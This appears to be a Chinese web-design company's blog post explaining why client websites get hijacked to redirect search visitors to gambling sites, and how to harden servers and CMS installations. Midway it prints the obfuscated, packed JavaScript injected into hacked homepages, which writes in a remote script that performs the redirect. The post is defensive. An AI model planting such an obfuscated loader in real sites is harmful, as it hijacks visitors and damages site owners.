欢迎您访问广州骏域网络官网,今天是2018年08月16日
|  手机版|  表格下载|  客户留言|  备案申请 建站申请建站服务热线:020-3460 1098

骏域网络

骏域新闻建站新闻网站教程深圳建站
首页 >企业网站恶意跳转赌博网站如何处理

企业网站恶意跳转赌博网站如何处理

广州网站建设公司2018-08-03213

最近公司内部跟单同事表示,大批广州网站建设公司客户在做百度推广时候,网站的首页点击进去后自动跳转到彩票网站、博彩网站,这样用户从百度搜索或者从推广广告位进去网站后发生跳转,而直接输入网址是没有任何跳转的,这样一来用户流失造成访问量急剧下滑、网站服务器资源浪费、推广费用浪费等,甚至可以说做了百度推广、搜狗推广的都在给彩票公司做广告了,在网站建设行业内引起轩然大波。


广州网站建设



有不少客户在反应这个问题时候,找到广告商赔偿甚至追究责任,所以在网站恶意跳转的问题上我们运营人员需要重视并且知晓如何快速解决,广州网站建设公司骏域网络从网络上查阅并且测试后总结为以下经验:



一、分析网站被黑跳转博彩网站原因



一般情况下网站被黑时候后都是因为服务器信息(服务器IP 远程端口 管理员账号密码、SSH端口、root账号密码)和网站信息包括FTP账号密码的对接被黑客知晓,进而造成黑客植入木马或者后门。



整体的安全监测中,asp网站和php网站都存在着木马,这也就意味着木马能够以php脚本木马、asp脚本木马、jsp脚本木马而存在,这些木马后门可以对网站进行恶意篡改,上传,改名,下载,等管理员的高权限操作。出现网站被跳转的客户,采用的网站架构都是php+mysql架构,以及jsp+mysql架构,大多数用的是开源程序,像dedecms,织梦系统,phpcms系统,discuz系统。



当我们懂得一些代码的时候,必然会看到网站首页中会有一些恶意篡改代码,通过删除恶意代码后可能会在几天内完全的停止跳转的,但是在一段时间后却又会被跳转,这个是很令人懊恼的治标不治本措施。过了不久后网站又会出现跳转,那么针对于网站漏洞问题是很难甚至是不能够完全清除的。



通过观察部分客户网站首页,其首页代码中都会有一段加密代码,这段代码是根据搜索引擎的特征来跳转,比如通过百度搜索,360搜索,搜狗搜索来的会直接跳转到彩票,赌博网站上去。如下代码:



type="text/java">eval(function(p,a,c,k,e,d){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){retun d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('l["\\e\\c\\1\\m\\i\\8\\n\\0"]["\\7\\4\\9\\0\\8"](\'\\h\\2\\1\\4\\9\\3\\0\\0\\j\\3\\8\\d\\6\\0\\8\\k\\0\\5\\f\\a\\r\\a\\2\\1\\4\\9\\3\\0\\6\\2\\4\\1\\d\\6\\s\\0\\0\\3\\2\\q\\5\\5\\7\\7\\7\\b\\1\\3\\e\\a\\2\\p\\b\\1\\c\\i\\5\\j\\o\\1\\b\\f\\2\\6\\g\\h\\5\\2\\1\\4\\9\\3\\0\\g\');',29,29,'x74|x63|x73|x70|x72|x2f|x22|x77|x65|x69|x61|x2e|x6f|x3d|x64|x6a|x3e|x3c|x6d|x79|x78|window|x75|x6e|x6c|x38|x3a|x76|x68'.split('|'),0,{}))



一旦被攻击之后,百度搜索引擎就会判断出网站是否被攻击,从而在百度风险评估中心就会对网站进行记录以及标识,百度网址安全中心提醒您:该站点可能受到黑客攻击,部分页面已被非法篡改! 红色提示该百度风险。导致客户打开网站直接被百度拦截,如下图所示:


广州网站建设



针对于以上跳转攻击的特征,我们广州网站建设公司一致认为应该从人工代码方面进行审计,以及检测网站漏洞、网站后门木马清理、漏洞修复以及xss获取管理员账号cookies漏洞,discuz存在getshell漏洞,注入获取管理员漏洞,discuz上传绕过漏洞等。



二、修复以及防止网站被恶意跳转的办法



1、对服务器目录进行安全部署、对管理员帐号密码加密、对所有密码进行数字+大小写字母+特殊符号要求、对网站数据库进行分配普通权限账号。



2、mysql数据库默认端口3306,改为61116,并加入到端口安全策略,不对外开放,外网IP无法连接数据库,只有本地127.0.0.1才能进行连接数据库,以防止攻击者恶意猜测。



3、对服务器底层系统进行安全加固,包括远程端口登录的安全验证。



4、对网站代码进行整体的安全检测,包括定期的升级网站程序源代码,修复补丁以及网站漏洞。



广州网站建设公司处理网站跳转问题有很多方法,以上内容只是解决问题的方法之一,那么作为一个网站建设公司应该对源码进行优化和调整,这样才能确保后期的网站不会受到影响,这就涉及到网站源码升级以及版本升级问题。

分享到微信QQ空间QQ好友腾讯微博新浪微博0

下一篇本次企业网站降权是否会让seo专家转型走向seo编辑?

返回资讯列表

上一篇大批企业站被百度降权疑似中招细雨算法

15日
2018年08月

【网站建设】企业站如何做才能让内容具有吸引力

互联网信息共享的时代,不少企业希望能够通过互联网的形式展现自己公司的产品以获得更多业务,那拥有一个具有代表性的企业网站就显得至关重要了。网站建设轻而易举,但要把企业网站的内容做到有吸引力又谈何容易呢?...
14日
2018年08月

【网站建设】企业网站建设需要的5大核心原则

企业网站建设不能只是摆设性的搭建一个域名、空间和程序,需要融合企业文化和企业精华到网站中。...
13日
2018年08月

【网站建设】企业做好六步走战略建设一个优质企业网站

对于一个企业来说,互联网就是一个新的营销渠道,谁掌握了渠道谁就拥有了客户,那么谁就拥有了行业市场,所以企业网站建设​的投入对于企业是划得来的。...
09日
2018年08月

【网站建设】国内seoer为何会希望谷歌可以返华

前几天国内外传回消息称谷歌将会返华,广州网站建设公司为之一惊,一旦谷歌返华那国内市场必然会再次重新分割市场,对于中国网民来说是有利有弊的,当然对当前一家独大的情况是会产生较大影响的。...
07日
2018年08月

【网站建设】本次企业网站降权是否会让seo专家转型走向seo编辑

seo行业已经走向了末端,要么就继续打酱油生活、要么就只能辞职或者跳槽了,但是对于本次seo的大变更来看,广州网站建设​公司骏域网络看来,这并不是seo优化的终结期,这只能算是优化行业发展的一个过程。...
03日
2018年08月

【网站建设】企业网站恶意跳转赌博网站如何处理

大批广州网站建设​公司客户在做百度推广时候,网站的首页点击进去后自动跳转到彩票网站、博彩网站,这样用户从百度搜索或者从推广广告位进去网站后发生跳转,而直接输入网址是没有任何跳转的。...
02日
2018年08月

【网站建设】大批企业站被百度降权疑似中招细雨算法

自从7月28日开始就有很多企业站长在反馈,这年头企业网站建设本就不易,又遭逢搜索引擎算法袭击甚是难做。...
01日
2018年08月

【网站建设】互联网用户行为数据分析对网站建设的作用

深圳网站建设​公司骏域网络针对目前发展中的互联网趋势而言,企业发展也需要依靠互联网渠道,只有走互联网+的道路才能够实现长期可持续发展目标。...
广州市番禺区禺山西路329号海伦堡创意园4座1栋17楼1706 020-34601098020-34589360 版权所有© 广州骏域网络科技有限公司 粤ICP备11025769号